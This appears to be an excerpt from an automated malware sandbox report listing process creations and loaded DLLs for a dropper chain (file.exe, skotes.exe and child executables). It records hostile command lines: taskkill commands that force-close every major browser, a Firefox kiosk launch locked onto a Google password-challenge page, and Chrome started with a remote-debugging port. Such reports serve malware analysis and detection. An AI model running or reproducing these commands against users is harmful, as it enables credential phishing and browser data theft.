Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe "C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2304 -parentBuildID 20230927232528 -prefsHandle 2240 -prefMapHandle 2224 -prefsLen 25416 -prefMapSize 238769 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ab10bdd4-e10f-4b35-aab2-8d4644c629cb} 8032 "\\.\pipe\gecko-crash-server-pipe.8032" 2870156eb10 socket
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe "C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe "C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe "C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Process created: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe "C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking	Jump to behavior
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2288 -parentBuildID 20230927232528 -prefsHandle 2224 -prefMapHandle 2216 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {117609fd-4f26-4a60-a0be-f2f21ea52b9b} 4128 "\\.\pipe\gecko-crash-server-pipe.4128" 1323d16ff10 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4212 -parentBuildID 20230927232528 -prefsHandle 4228 -prefMapHandle 4224 -prefsLen 26374 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3addc31c-4409-4228-89b4-cd724dc8ae4f} 4128 "\\.\pipe\gecko-crash-server-pipe.4128" 1324d872210 rdd
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2328 --field-trial-handle=2296,i,4526499487474445861,3926510125965509157,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2304 -parentBuildID 20230927232528 -prefsHandle 2240 -prefMapHandle 2224 -prefsLen 25416 -prefMapSize 238769 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ab10bdd4-e10f-4b35-aab2-8d4644c629cb} 8032 "\\.\pipe\gecko-crash-server-pipe.8032" 2870156eb10 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: wshbth.dll	Jump to behavior
